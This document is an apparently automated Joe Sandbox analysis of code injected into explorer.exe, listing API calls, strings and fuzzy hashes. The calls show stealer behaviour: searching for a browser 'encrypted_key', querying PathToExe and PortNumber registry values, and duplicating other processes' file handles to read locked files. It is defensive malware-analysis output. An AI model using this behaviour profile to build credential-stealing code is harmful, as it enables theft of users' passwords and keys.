• Source File: 0000000D.00000002.2747671125.0000000002751000.00000040.80000000.00040000.00000000.sdmp, Offset: 02751000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_2751000_explorer.jbxd
Similarity
• API ID: CreateFilememset
• String ID: psow$winOpen
• API String ID: 2416746761-4101858489
• Opcode ID: a6f5702db1640e3fa9c7ac50bde9664745fafc5f50f8945bdf687304d56eb35a
• Instruction ID: 352460e21b687e99cf7fff081949fb2fb567135d49f51078d7283b3ac05f4883
• Opcode Fuzzy Hash: a6f5702db1640e3fa9c7ac50bde9664745fafc5f50f8945bdf687304d56eb35a
• Instruction Fuzzy Hash: DA715C71A047219FD711DF24C88572AFBE5BF88728F005A2DF864A7284D7B4E954CF92
Memory Dump Source
                                                                                                                                        • Source File: 0000000D.00000002.2747671125.00000000027B7000.00000040.80000000.00040000.00000000.sdmp, Offset: 027B7000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_13_2_27b7000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: d3630c40df3110ee09b219fad5869862f09d38708a96374ed10907fbfa5b2522
                                                                                                                                        • Instruction ID: d58128291962139d7e79c7dab109ac6701168f60ccfcb2990cf855ee67909e5d
                                                                                                                                        • Opcode Fuzzy Hash: d3630c40df3110ee09b219fad5869862f09d38708a96374ed10907fbfa5b2522
                                                                                                                                        • Instruction Fuzzy Hash: 1EA119B2954752DFD7228E78DCC47E1BBA5EF42224B1C066DC7F19B2C2E760540ACB61
                                                                                                                                        APIs
                                                                                                                                        • RegOpenKeyExW.KERNEL32(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,02751AE2,PortNumber,00000000,00000000), ref: 02751A1E
                                                                                                                                        • RegQueryValueExW.KERNEL32(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 02751A3C
                                                                                                                                        • RegQueryValueExW.KERNEL32(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 02751A75
                                                                                                                                        • RegCloseKey.KERNEL32(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,02751AE2,PortNumber,00000000,00000000), ref: 02751A98
                                                                                                                                          • Part of subcall function 02751011: GetProcessHeap.KERNEL32(00000000,00000000,?,02751A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,02751AE2), ref: 02751020
                                                                                                                                          • Part of subcall function 02751011: RtlFreeHeap.NTDLL(00000000,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,02751AE2,PortNumber,00000000,00000000), ref: 02751027
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000D.00000002.2747671125.0000000002751000.00000040.80000000.00040000.00000000.sdmp, Offset: 02751000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_13_2_2751000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: HeapQueryValue$CloseFreeOpenProcess
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 217796345-0
                                                                                                                                        • Opcode ID: 1fec1e7a18f2744218fbc9ba68f07aa24d7deb1fd938f957e5b015fcc31eaf3b
                                                                                                                                        • Instruction ID: d212aa7d3500bccdd68b17703bf47e6c3d46f37807d9fac09f2e662dee735e81
                                                                                                                                        • Opcode Fuzzy Hash: 1fec1e7a18f2744218fbc9ba68f07aa24d7deb1fd938f957e5b015fcc31eaf3b
                                                                                                                                        • Instruction Fuzzy Hash: F421BF72604251AFEB268A21CD48F3BF7EDEBC875AF444A2DFD8D92140E7B0CD408661
                                                                                                                                        APIs
                                                                                                                                        • RegOpenKeyW.ADVAPI32(?,?,?), ref: 02751ED5
                                                                                                                                          • Part of subcall function 02751000: GetProcessHeap.KERNEL32(00000008,?,027511C7,?,?,00000001,00000000,?), ref: 02751003
                                                                                                                                          • Part of subcall function 02751000: RtlAllocateHeap.NTDLL(00000000), ref: 0275100A
                                                                                                                                        • RegEnumKeyExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 02751F0C
                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 02751F98
                                                                                                                                          • Part of subcall function 02751953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,02752F0C), ref: 02751973
                                                                                                                                          • Part of subcall function 02751953: lstrlenW.KERNEL32(027A6564,?,?,02752F0C), ref: 02751978
                                                                                                                                          • Part of subcall function 02751953: lstrcatW.KERNEL32(00000000,?,?,?,02752F0C), ref: 02751990
                                                                                                                                          • Part of subcall function 02751953: lstrcatW.KERNEL32(00000000,027A6564,?,?,02752F0C), ref: 02751994
                                                                                                                                        • RegEnumKeyExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 02751F82
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000D.00000002.2747671125.0000000002751000.00000040.80000000.00040000.00000000.sdmp, Offset: 02751000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_13_2_2751000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: EnumHeaplstrcatlstrlen$AllocateCloseOpenProcess
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1077800024-0
                                                                                                                                        • Opcode ID: 0391e2bf532a8850416e3a02b1b2b9fc2d2c9df71f85583e33eff7dfbdefdbc5
                                                                                                                                        • Instruction ID: ffe832b3b939fb73d2f5a9a1bd97aa8191423eb687c238aa4ba49b9577f3568c
                                                                                                                                        • Opcode Fuzzy Hash: 0391e2bf532a8850416e3a02b1b2b9fc2d2c9df71f85583e33eff7dfbdefdbc5
                                                                                                                                        • Instruction Fuzzy Hash: 1C21AE706083516FDB05AB20DC48E3BBBEEEFC8315F40892CF89D92140EBB4C8149B62
                                                                                                                                        APIs
                                                                                                                                        • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,00000000,00000000,00000000,02753E1E,00000000,?,02753FA8), ref: 02751C46
                                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000,00000000,?,02753FA8), ref: 02751C56
                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,02753FA8), ref: 02751C91
                                                                                                                                          • Part of subcall function 02751000: GetProcessHeap.KERNEL32(00000008,?,027511C7,?,?,00000001,00000000,?), ref: 02751003
                                                                                                                                          • Part of subcall function 02751000: RtlAllocateHeap.NTDLL(00000000), ref: 0275100A
                                                                                                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,02753FA8), ref: 02751C76
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000D.00000002.2747671125.0000000002751000.00000040.80000000.00040000.00000000.sdmp, Offset: 02751000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_13_2_2751000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$Heap$AllocateCloseCreateHandleProcessReadSize
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2517252058-0
                                                                                                                                        • Opcode ID: 5e354f38dcd3f2209cc261e7afc45fb7830be93dbe3eae28f30c23f55598f7a0
                                                                                                                                        • Instruction ID: e87d71547d40ea589f0775a12b85f9b008a14cbc089627d5196c1d61cc138661
                                                                                                                                        • Opcode Fuzzy Hash: 5e354f38dcd3f2209cc261e7afc45fb7830be93dbe3eae28f30c23f55598f7a0
                                                                                                                                        • Instruction Fuzzy Hash: CAF028322012287BD6201A25DC8CF7BBB5CDB826FBF160718FC1E921C0FBA368515171
                                                                                                                                        APIs
                                                                                                                                        • StrStrIA.SHLWAPI(00000000,"encrypted_key":",00000000,00000000,00000000,02753E30,00000000,00000000,?,02753FA8), ref: 02752FC1
                                                                                                                                        • lstrlen.KERNEL32("encrypted_key":",?,02753FA8), ref: 02752FCE
                                                                                                                                        • StrStrIA.SHLWAPI("encrypted_key":",027A692C,?,02753FA8), ref: 02752FDD
                                                                                                                                          • Part of subcall function 0275190B: lstrlen.KERNEL32(?,?,?,?,00000000,02752783), ref: 0275192B
                                                                                                                                          • Part of subcall function 0275190B: lstrlen.KERNEL32(00000000,?,?,?,00000000,02752783), ref: 02751930
                                                                                                                                          • Part of subcall function 0275190B: lstrcat.KERNEL32(00000000,?), ref: 02751946
                                                                                                                                          • Part of subcall function 0275190B: lstrcat.KERNEL32(00000000,00000000), ref: 0275194A
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000D.00000002.2747671125.0000000002751000.00000040.80000000.00040000.00000000.sdmp, Offset: 02751000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_13_2_2751000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrlen$lstrcat
                                                                                                                                        • String ID: "encrypted_key":"
                                                                                                                                        • API String ID: 493641738-877455259
                                                                                                                                        • Opcode ID: b10946c4346c4e687d8f341b1c70b1f2e02602d1b55e4f84ecafeae2a7625801
                                                                                                                                        • Instruction ID: 9ab23b1c75348fc98a9fd0eb436efe55b191736d33191b6378c98497d9b649ea
                                                                                                                                        • Opcode Fuzzy Hash: b10946c4346c4e687d8f341b1c70b1f2e02602d1b55e4f84ecafeae2a7625801
                                                                                                                                        • Instruction Fuzzy Hash: 12E02222F4A6745F9B266BB56C98847BF0CAE8312530D4068EE0283143DFE28802D7A4
                                                                                                                                        APIs
                                                                                                                                        • GetFileAttributesW.KERNEL32(00000000,00000000,00000000,?,readonly_shm,00000000,00000000,?,?,?), ref: 0275BB40
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000D.00000002.2747671125.0000000002751000.00000040.80000000.00040000.00000000.sdmp, Offset: 02751000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_13_2_2751000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AttributesFile
                                                                                                                                        • String ID: winDelete
                                                                                                                                        • API String ID: 3188754299-3936022152
                                                                                                                                        • Opcode ID: 63c0095ae49b3290db55ccb4b3f65058a951121a8f4638c4c7f4a52e37c46213
                                                                                                                                        • Instruction ID: 50b8387e8b343e317420c172dd21f20e8f662194b79f7e5aeb5092005e0ccd99
                                                                                                                                        • Opcode Fuzzy Hash: 63c0095ae49b3290db55ccb4b3f65058a951121a8f4638c4c7f4a52e37c46213
                                                                                                                                        • Instruction Fuzzy Hash: 7B110831E00A28EB9B12AB78C855D7DF776DB81768F105629EC06E728CDBF09901CB52
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 02751011: GetProcessHeap.KERNEL32(00000000,00000000,?,02751A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,02751AE2), ref: 02751020
                                                                                                                                          • Part of subcall function 02751011: RtlFreeHeap.NTDLL(00000000,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,02751AE2,PortNumber,00000000,00000000), ref: 02751027
                                                                                                                                          • Part of subcall function 02751000: GetProcessHeap.KERNEL32(00000008,?,027511C7,?,?,00000001,00000000,?), ref: 02751003
                                                                                                                                          • Part of subcall function 02751000: RtlAllocateHeap.NTDLL(00000000), ref: 0275100A
                                                                                                                                        • RegOpenKeyExW.KERNEL32(?,?,00000000,00020119,?), ref: 02752EE4
                                                                                                                                        • RegEnumKeyExW.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 02752F54
                                                                                                                                        • RegCloseKey.KERNEL32(?), ref: 02752F62
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000D.00000002.2747671125.0000000002751000.00000040.80000000.00040000.00000000.sdmp, Offset: 02751000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_13_2_2751000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Heap$Process$AllocateCloseEnumFreeOpen
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1066184869-0
                                                                                                                                        • Opcode ID: 3e5f9449f18d186f71ab9ca5cb5fbd1ba62fdf30f40601ac7113e207e0e95ba1
                                                                                                                                        • Instruction ID: 0c9dfd2da33a507fb95c6feb8707ef2c8b2e5556d11f095d36070666d72cb37e
                                                                                                                                        • Opcode Fuzzy Hash: 3e5f9449f18d186f71ab9ca5cb5fbd1ba62fdf30f40601ac7113e207e0e95ba1
                                                                                                                                        • Instruction Fuzzy Hash: 01014F31244260AB8A16AB21DC08E6FBBAAEFC5351B05442DFC5DA2180DB758955DBA1
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000D.00000002.2747671125.0000000002751000.00000040.80000000.00040000.00000000.sdmp, Offset: 02751000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_13_2_2751000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ExitInitializeProcessUninitialize
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4175140541-0
                                                                                                                                        • Opcode ID: 6771aa9b63f293ca7a4cfa3370bc010133382d742e1dd9b9a59c3e0b6527f419
                                                                                                                                        • Instruction ID: 4c596b9c6cb6269d47245c00fcae6c26bf9f1aa63aed505947c33496ab21807a
• Opcode Fuzzy Hash: 6771aa9b63f293ca7a4cfa3370bc010133382d742e1dd9b9a59c3e0b6527f419
• Instruction Fuzzy Hash: C0C04C35B841105BEE802FE09C1D70A7A59AB80B23F088804F605C50C0DBB040518A26
APIs
• HeapCreate.KERNEL32(00000000,00BD0000,00000000), ref: 02759FF8
Strings
• failed to HeapCreate (%lu), flags=%u, initSize=%lu, maxSize=%lu, xrefs: 0275A00E
Memory Dump Source
• Source File: 0000000D.00000002.2747671125.0000000002751000.00000040.80000000.00040000.00000000.sdmp, Offset: 02751000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_2751000_explorer.jbxd
Similarity
• API ID: CreateHeap
• String ID: failed to HeapCreate (%lu), flags=%u, initSize=%lu, maxSize=%lu
• API String ID: 10892065-982776804
• Opcode ID: 0f721904734d532599e2da97b1f5ff61cf8c5a0d62a3fb05e6704fd9b7129f5e
• Instruction ID: ea15d8042f81026be6a93536d8e3c67af0c6f1453c92cdea9e75cbde25cf03c1
• Opcode Fuzzy Hash: 0f721904734d532599e2da97b1f5ff61cf8c5a0d62a3fb05e6704fd9b7129f5e
• Instruction Fuzzy Hash: B8F04672A44320FAE7311950EC88F27E79CDF8A785F108829FE4A96180F3F16C018370
APIs
  • Part of subcall function 02751000: GetProcessHeap.KERNEL32(00000008,?,027511C7,?,?,00000001,00000000,?), ref: 02751003
  • Part of subcall function 02751000: RtlAllocateHeap.NTDLL(00000000), ref: 0275100A
• SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,00000000,00000000,?,?,02752E83,PathToExe,00000000,00000000), ref: 02751B16
  • Part of subcall function 02751011: GetProcessHeap.KERNEL32(00000000,00000000,?,02751A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,02751AE2), ref: 02751020
  • Part of subcall function 02751011: RtlFreeHeap.NTDLL(00000000,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,02751AE2,PortNumber,00000000,00000000), ref: 02751027
  • Part of subcall function 027519E5: RegOpenKeyExW.KERNEL32(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,02751AE2,PortNumber,00000000,00000000), ref: 02751A1E
  • Part of subcall function 027519E5: RegQueryValueExW.KERNEL32(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 02751A3C
  • Part of subcall function 027519E5: RegQueryValueExW.KERNEL32(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 02751A75
  • Part of subcall function 027519E5: RegCloseKey.KERNEL32(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,02751AE2,PortNumber,00000000,00000000), ref: 02751A98
Strings
• Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 02751B40
Memory Dump Source
• Source File: 0000000D.00000002.2747671125.0000000002751000.00000040.80000000.00040000.00000000.sdmp, Offset: 02751000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_2751000_explorer.jbxd
Similarity
• API ID: Heap$ProcessQueryValue$AllocateCloseFolderFreeOpenPath
• String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
• API String ID: 2162223993-2036018995
• Opcode ID: 1c1dd1d0e0f46b0970c786d5d7f381068317c9f26e116cd2b970042b6b2ddd80
• Instruction ID: b5df2ba60f480ff833ab296bc577deada3aa238c5decad8f0e4d544991030406
• Opcode Fuzzy Hash: 1c1dd1d0e0f46b0970c786d5d7f381068317c9f26e116cd2b970042b6b2ddd80
• Instruction Fuzzy Hash: B5F0B426B40AAC17D612692ACC98F67B74FCBC12A73974129FC1DA3241EE62AC015664
APIs
• SetFilePointer.KERNEL32(?,?,?,00000000), ref: 0275A35F
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2747671125.0000000002751000.00000040.80000000.00040000.00000000.sdmp, Offset: 02751000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_2751000_explorer.jbxd
Similarity
• API ID: FilePointer
• String ID: winSeekFile
• API String ID: 973152223-3168307952
• Opcode ID: d0cc58a5c2200997027a21a4533b593a12fcaa661148862845cc260693df2447
• Instruction ID: 617b23b12c47ccd62d69c4724c3611148c3153e72d111ce08df5533b0cdb492a
• Opcode Fuzzy Hash: d0cc58a5c2200997027a21a4533b593a12fcaa661148862845cc260693df2447
• Instruction Fuzzy Hash: 1AF0B430A14204AFE7129F74DC00EBBBBAAEB45321B50C779FC65D62D0DB70DD1096A0
APIs
• RtlAllocateHeap.NTDLL(04C60000,00000000,?), ref: 02759EB5
Strings
• failed to HeapAlloc %u bytes (%lu), heap=%p, xrefs: 02759ECD
Memory Dump Source
• Source File: 0000000D.00000002.2747671125.0000000002751000.00000040.80000000.00040000.00000000.sdmp, Offset: 02751000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_2751000_explorer.jbxd
Similarity
• API ID: AllocateHeap
• String ID: failed to HeapAlloc %u bytes (%lu), heap=%p
• API String ID: 1279760036-667713680
• Opcode ID: 26b833c7da55f6b840b1356eed0faa64db266364c8452eecef5f7ec02d368a4c
• Instruction ID: 3808ecc049af5adc8014c2eaa29c21a3386119afd933facd64b09bb850d1a33a
• Opcode Fuzzy Hash: 26b833c7da55f6b840b1356eed0faa64db266364c8452eecef5f7ec02d368a4c
• Instruction Fuzzy Hash: 61E0C273A84220BBD2132684AC14F2FFB69DBC6F20F058815FE05A6240C270A82287B6
APIs
• RtlFreeHeap.NTDLL(04C60000,00000000,?), ref: 02759EF8
Strings
• failed to HeapFree block %p (%lu), heap=%p, xrefs: 02759F0E
Memory Dump Source
• Source File: 0000000D.00000002.2747671125.0000000002751000.00000040.80000000.00040000.00000000.sdmp, Offset: 02751000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_2751000_explorer.jbxd
Similarity
• API ID: FreeHeap
• String ID: failed to HeapFree block %p (%lu), heap=%p
• API String ID: 3298025750-4030396798
• Opcode ID: c64284a9fd136fb0cf5913fbe95090736d5b17ea9512000da96d32d284e527a9
• Instruction ID: 6222a20f986d98b421652659b60670dbfd53852c96c1f0953e01d2eecff65896
• Opcode Fuzzy Hash: c64284a9fd136fb0cf5913fbe95090736d5b17ea9512000da96d32d284e527a9
• Instruction Fuzzy Hash: 9AD01273548201F7D6025A54DC15F2FFB799B96B00F444819FA1595095D3B06061ABB5
APIs
• CreateFileW.KERNEL32(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,02752893,00000000,00000000,00000000,?), ref: 02751B82
• CloseHandle.KERNEL32(00000000), ref: 02751B8F
Memory Dump Source
• Source File: 0000000D.00000002.2747671125.0000000002751000.00000040.80000000.00040000.00000000.sdmp, Offset: 02751000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_2751000_explorer.jbxd
Similarity
• API ID: CloseCreateFileHandle
• String ID:
• API String ID: 3498533004-0
• Opcode ID: 2336bdc0fd7822eb3a980d111c6d1d6ae461eef26ee5a9ac3ee8c0382889f5d6
• Instruction ID: 8a12abdf6043bca9a813dc0395ddfda5db317487093b3f0bfdfa279fb001dd0c
• Opcode Fuzzy Hash: 2336bdc0fd7822eb3a980d111c6d1d6ae461eef26ee5a9ac3ee8c0382889f5d6
• Instruction Fuzzy Hash: 2ED05B71653A3062D97516397C0DFE7AF1CDF435BAB484A14F81DD50C0E36489D781E0
APIs
  • Part of subcall function 02751162: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0275116F
• GetProcessHeap.KERNEL32(00000000,00000000,?,02751A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,02751AE2), ref: 02751020
• RtlFreeHeap.NTDLL(00000000,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,02751AE2,PortNumber,00000000,00000000), ref: 02751027
Memory Dump Source
• Source File: 0000000D.00000002.2747671125.0000000002751000.00000040.80000000.00040000.00000000.sdmp, Offset: 02751000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_2751000_explorer.jbxd
Similarity
• API ID: Heap$FreeProcessQueryVirtual
• String ID:
• API String ID: 2580854192-0
• Opcode ID: bd42d260c2b88de9d49a8ccf553d10ca3064d87a065ed646ec7faeb384370a55
• Instruction ID: 64efc70736405f23b707598e3d47bb8925fdedc7e98492616949b0cc730649b8
• Opcode Fuzzy Hash: bd42d260c2b88de9d49a8ccf553d10ca3064d87a065ed646ec7faeb384370a55
• Instruction Fuzzy Hash: 14C04C71D4527056CD6027A4B90CBCA6F1DDF89277F494881B90AA7185CAB6885186A0
APIs
• GetProcessHeap.KERNEL32(00000008,?,027511C7,?,?,00000001,00000000,?), ref: 02751003
• RtlAllocateHeap.NTDLL(00000000), ref: 0275100A
Memory Dump Source
• Source File: 0000000D.00000002.2747671125.0000000002751000.00000040.80000000.00040000.00000000.sdmp, Offset: 02751000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_2751000_explorer.jbxd
Similarity
• API ID: Heap$AllocateProcess
• String ID:
• API String ID: 1357844191-0
• Opcode ID: cb6c29a6a2a03ec6b674eb53d300dd142b0509fd5759fe6821104598c1c669f0
• Instruction ID: e3a85956634a2a90017c169d36d0cf41ae616b83f7e44ccac076308a41ca43a0
• Opcode Fuzzy Hash: cb6c29a6a2a03ec6b674eb53d300dd142b0509fd5759fe6821104598c1c669f0
• Instruction Fuzzy Hash: 8DA002B5D901045BDD4457A4DA0DA1A3D1CF7C4712F148944715686081D97454148721
APIs
• RtlZeroMemory.NTDLL(?,00000018), ref: 027512B5
Memory Dump Source
• Source File: 0000000D.00000002.2747671125.0000000002751000.00000040.80000000.00040000.00000000.sdmp, Offset: 02751000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_2751000_explorer.jbxd
Similarity
• API ID: MemoryZero
• String ID:
• API String ID: 816449071-0
• Opcode ID: ca2aeefa75c0287ededb453615f5d72916c6f0f1d6ff947d587cf8c82d3bf479
• Instruction ID: fdf87fa5490d98798fbc4089ada11ad3367b28f77ec8a72ba1fa4a3afd3965ea
• Opcode Fuzzy Hash: ca2aeefa75c0287ededb453615f5d72916c6f0f1d6ff947d587cf8c82d3bf479
• Instruction Fuzzy Hash: A11125B5F01219AFDB10DFA8E884ABFBBBCEB48211B048429FD49E3240D770D900CB60
APIs
• GetFileAttributesW.KERNEL32(00000000,00000000,02752C8F,00000000,00000000,?,?,00000000,PathToExe,00000000,00000000), ref: 02751BAA
Memory Dump Source
• Source File: 0000000D.00000002.2747671125.0000000002751000.00000040.80000000.00040000.00000000.sdmp, Offset: 02751000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_2751000_explorer.jbxd
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
• Opcode ID: 9870c40de46f0bc0ffa7d582ddaa423b981e3cad6f09215ab01b58ad84cbe904
• Instruction ID: 5ca12d835557ebcf2ea77bbf68a2413104f2f897b3fdec4ac53594cd1ae80ed7
• Opcode Fuzzy Hash: 9870c40de46f0bc0ffa7d582ddaa423b981e3cad6f09215ab01b58ad84cbe904
• Instruction Fuzzy Hash: F7D0A933E02832828A64563C3808A92E2806A4057E39A07B4FC2AF30C0E368CC8282C0
APIs
• CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 02751684
Memory Dump Source
• Source File: 0000000D.00000002.2747671125.0000000002751000.00000040.80000000.00040000.00000000.sdmp, Offset: 02751000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_2751000_explorer.jbxd
Similarity
• API ID: CreateGlobalStream
• String ID:
• API String ID: 2244384528-0
• Opcode ID: a1c8798e5c564a21bb05df6ecdf8341008223bd68a12d37da6238fff50187630
• Instruction ID: 471c046953e4042467477eeb72f1c570410824e9a5230cd2afa69c7d29b2569a
• Opcode Fuzzy Hash: a1c8798e5c564a21bb05df6ecdf8341008223bd68a12d37da6238fff50187630
• Instruction Fuzzy Hash: 27C08C31560231EFEB301A308C09B8676D8EF09BB3F0A0D29E4C5DD0C0E6F408C0CA90
APIs
• VirtualAlloc.KERNEL32(00000000,?,00003000,00000040,0275158A), ref: 02751056
Memory Dump Source
• Source File: 0000000D.00000002.2747671125.0000000002751000.00000040.80000000.00040000.00000000.sdmp, Offset: 02751000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_2751000_explorer.jbxd
Similarity
• API ID: AllocVirtual
• String ID:
                                                                                                                                        • API String ID: 4275171209-0
                                                                                                                                        • Opcode ID: 606b52829f015f1366746f68aadf3e01504631893eb28b85f014c5f836ad7cf6
                                                                                                                                        • Instruction ID: 3aaa514193f8c175e3bab3b12ddc75f4d96b4a1eccfb16f54197e0f16d68302b
                                                                                                                                        • Opcode Fuzzy Hash: 606b52829f015f1366746f68aadf3e01504631893eb28b85f014c5f836ad7cf6
                                                                                                                                        • Instruction Fuzzy Hash: D5A002F0BD57007AFD695762AE1FF26293C9780F12F144644B30D7C0C055F47550892D
                                                                                                                                        APIs
                                                                                                                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,02754A5B,?,?,00000000,?,?,?,?,02754B66,?), ref: 02751065
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000D.00000002.2747671125.0000000002751000.00000040.80000000.00040000.00000000.sdmp, Offset: 02751000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_13_2_2751000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FreeVirtual
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1263568516-0
                                                                                                                                        • Opcode ID: c67c4e13e641f7aa4d68bfe988c8288f795e0814e8487b39d07904d14dc881d2
                                                                                                                                        • Instruction ID: 2123a57cf4cee8c595e497d613daa3d5d6a15ef8c0247a29904073925ba58b4c
                                                                                                                                        • Opcode Fuzzy Hash: c67c4e13e641f7aa4d68bfe988c8288f795e0814e8487b39d07904d14dc881d2
                                                                                                                                        • Instruction Fuzzy Hash: 87A002B0ED070066EDB457209D0EF052A18A780B11F2489447251A90C159B5E0548A18
                                                                                                                                        APIs
                                                                                                                                        • CreateFileW.KERNEL32(?,00000080,00000000,00000000,00000003,00000000,00000000,00000000,00000000,?,00000000), ref: 027534C0
                                                                                                                                          • Part of subcall function 027533C3: NtQueryInformationFile.NTDLL(00000000,00002000,00000000,00002000,0000002F), ref: 02753401
                                                                                                                                        • OpenProcess.KERNEL32(00000440,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,027537A8), ref: 027534E9
                                                                                                                                          • Part of subcall function 02751000: GetProcessHeap.KERNEL32(00000008,?,027511C7,?,?,00000001,00000000,?), ref: 02751003
                                                                                                                                          • Part of subcall function 02751000: RtlAllocateHeap.NTDLL(00000000), ref: 0275100A
                                                                                                                                        • NtQueryInformationProcess.NTDLL(00000000,00000033,00000000,?,?), ref: 0275351E
                                                                                                                                        • NtQueryInformationProcess.NTDLL(00000000,00000033,00000000,?,?), ref: 02753541
                                                                                                                                        • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 02753586
                                                                                                                                        • DuplicateHandle.KERNEL32(00000000,00000000,00000000), ref: 0275358F
                                                                                                                                        • lstrcmpiW.KERNEL32(00000000,File), ref: 027535B6
                                                                                                                                        • NtQueryObject.NTDLL(?,00000001,00000000,00001000,00000000), ref: 027535DE
                                                                                                                                        • StrRChrW.SHLWAPI(?,00000000,0000005C), ref: 027535F6
                                                                                                                                        • StrRChrW.SHLWAPI(?,00000000,0000005C), ref: 02753606
                                                                                                                                        • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0275361E
                                                                                                                                        • GetFileSize.KERNEL32(?,00000000), ref: 02753631
                                                                                                                                        • SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 02753658
                                                                                                                                        • SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 0275366B
                                                                                                                                        • ReadFile.KERNEL32(?,?,00000000,?,00000000), ref: 02753681
                                                                                                                                        • SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 027536AD
